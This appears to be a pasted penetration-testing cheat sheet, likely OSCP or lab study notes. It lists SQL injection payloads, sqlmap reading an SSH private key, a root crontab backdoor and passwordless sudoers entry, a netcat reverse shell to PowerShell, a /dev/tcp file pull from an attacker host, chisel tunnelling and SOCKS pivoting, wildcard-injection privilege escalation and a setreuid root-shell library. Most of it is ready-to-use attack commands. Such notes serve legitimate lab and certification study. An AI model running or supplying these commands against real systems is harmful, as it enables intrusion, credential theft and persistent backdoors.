· 6 years ago · Feb 21, 2020, 05:54 PM
1* FUZZING REST API FOR SQLi
2 - GET /users/admin'%20or%201='1
3 - GET /users/admin'%20or%201='1'%20limit%201,1--%20-
4 - GET /users/admin'%20or%201='1'%20limit%200,1--%20-
5
6* SQLMap automatic injection point
7 - '*'
8 - /users/*
9
10* SQLMap file read
11 - --file-read /home/dorthi/.ssh/id_rsa
12
13* MySQL SQLi - load file contents
14 - GET /users/inexistent'%20union%20select%20all%20LOAD_FILE(0x<file path in hex>)--%20-
15 - python3
16 - import binascii
17 - binascii.hexlify(b"<file path")
18
19* AWK - print 4th field from CSV (',' separator)
20 - awk -F, 'print {$4}'
21
22* Server-side inection payloads
23 - Payload all the things
24
25* netcat check port status
26 - nc -zv <ip> <port>
27
28* decrypt RSA public key
29 - openssl rsa -in <filename> -out <output filename>
30
31* SSH command mode
32 - ~C on a new line before any keystrokes
33 - -L9000:<remote ip>:9000
34
35* Port knocking with bash
36 - for i in <port1> <port2> <port3>; do nc -zu <ip> $i; done
37
38* root filesystem access (container mapping) -> interactive shell
39 - edit /var/spool/cron/crontabs/root
40 - add entry: * * * * * /tmp/backdoor.sh
41 - edit /etc/sudoers
42 - add entry: <username> ALL=(ALL) NOPASSWD: /bin/sh
43 - sudo /bin/sh
44
45* wfuzz hide results with 0 lines
46 - wfuzz -u <url> -w <wordlist> --hl 0
47
48* wfuzz hide results with specific text
49 - wfuzz -u <url> -w <wordlist> --hs "<text>"
50
51* test smb credentials
52 - smbmap -u <username> -p <password> -H <host>
53 - smbclient -U '<username>%<password>' \\\\<host>\\<sharename>
54
55* faster but less reliable full scan
56 - nmap -v --max-retries=0 -T5 -p- <ip>
57
58* 64-bit netcat for Windows
59 - https://eternallybored.org/misc/netcat/
60 - nc64.exe <ip> <port> -e powershell
61
62* check windows user privileges
63 - whoami /all
64 - if SeImpersonate or SeAssignPrimaryToken:
65 - https://github.com/ohpe/juicy-potato
66
67* bash on Windows filesystem location
68 - c:\users\<username>\appdata\local\packages\CanonicalGroupLimited.*\LocalState\rootfs\
69
70* Pivoting without SSH
71 - https://github.com/jpillora/chisel
72
73* OSCP resources
74 - https://0xdf.gitlab.io/tags.html#oscp
75
76* JavaScript Beautifier
77 - https://beautifier.io/
78
79* reverse image search
80 - google.com/images
81 - search by image
82
83* JSON command line processor
84 - https://stedolan.github.io/jq/
85
86* File transfer without netcat
87 - bash -c "cat < /dev/tcp/<attacker ip>/<attacker port> > /dev/shm/LinEnum.sh"
88
89* JWT cracking with john
90 - https://github.com/Sjord/jwtcrack/blob/master/jwt2john.py
91
92* Server-side template injection tool
93 - https://github.com/epinna/tplmap
94 - also burp extension
95
96* curl alternative
97 - httpie
98
99* Useful payloads
100 - https://github.com/swisskyrepo/PayloadsAllTheThings
101
102* Server-side template injection strategy
103 - https://portswigger.net/blog/server-side-template-injection
104
105* Statically-linked Linux/Darwin/Windows binaries
106 - https://github.com/andrew-d/static-binaries
107
108* chisel forward local 8001 to remote 80
109 - [kali] chisel server -p 8000 -reverse -v
110 - [target] chisel client <kali ip>:8000 R:<kali listening ip>:8001:<target ip>:80
111 - [kali] curl http://localhost:8001 -> returns http://<target ip>/
112 - e.g. access hidden service, possibly on another network, from local host
113
114* Port scan without nmap or nc
115 - for port in $(seq 1 65535); do
116 (echo scan > /dev/tcp/<ip>/$port && echo "open - $port") 2>/dev/null
117 done
118
119* chisel forward remote port to local port (remote 9001 to kali 8001)
120 - [kali] chisel server -p 8000 -reverse -v
121 - [target] chisel client <kali ip>:8000 9001:127.0.0.1:8001
122 - [kali] nc -nlvp 8001
123 - e.g. proxy remote reverse shell, possibly on another network through remote host to local
124 - anything sent to remote host 9001/tcp gets forwarded to local 8001/tcp
125
126* Escape restricted environments
127 - https://gtfobins.github.io/
128 - https://lolbas-project.github.io/
129
130* Privesc via shell filename expansion
131 - touch -- '<filename>'
132 - touch -- '-e sh <shell script file>.rdb'
133 - touch -- '-e "sh <shell script file>.rdb"'
134 - vulnerable binary: rsync <args> *.rdb becomes rsync <args> -e sh <shell script file>.rdb
135
136* chisel as SOCKS proxy
137 - [kali] chisel server -p 8000 -reverse
138 - [target] chisel client <kali ip>:8000 R:8001:127.0.0.1:1337
139 - [target] chisel server -p 1337 --socks5
140 - [kali] chisel client 127.0.0.1:8001 socks
141 - [kali] run socks client with proxy configured as 1080/tcp on <kali ip>
142 - proxychains nmap -sT ...
143
144* list wfuzz payloads
145 - wfuzz -z help
146 - wfuzz -z range,1-65535 ...
147
148* devops cheat sheets
149 - https://lzone.de/
150
151* list libraries linked to binary
152 - ldd <binary path>
153
154* compile shared library
155 - gcc -shared -fPIC -o <output filename> <input filename>
156 - ldconfig
157 - simple privesc shell:
158 #include <stdio.h>
159 extern int seclogin();
160 int seclogin(){
161 setreuid(0,0);
162 execve("/bin/bash", NULL, NULL);
163 }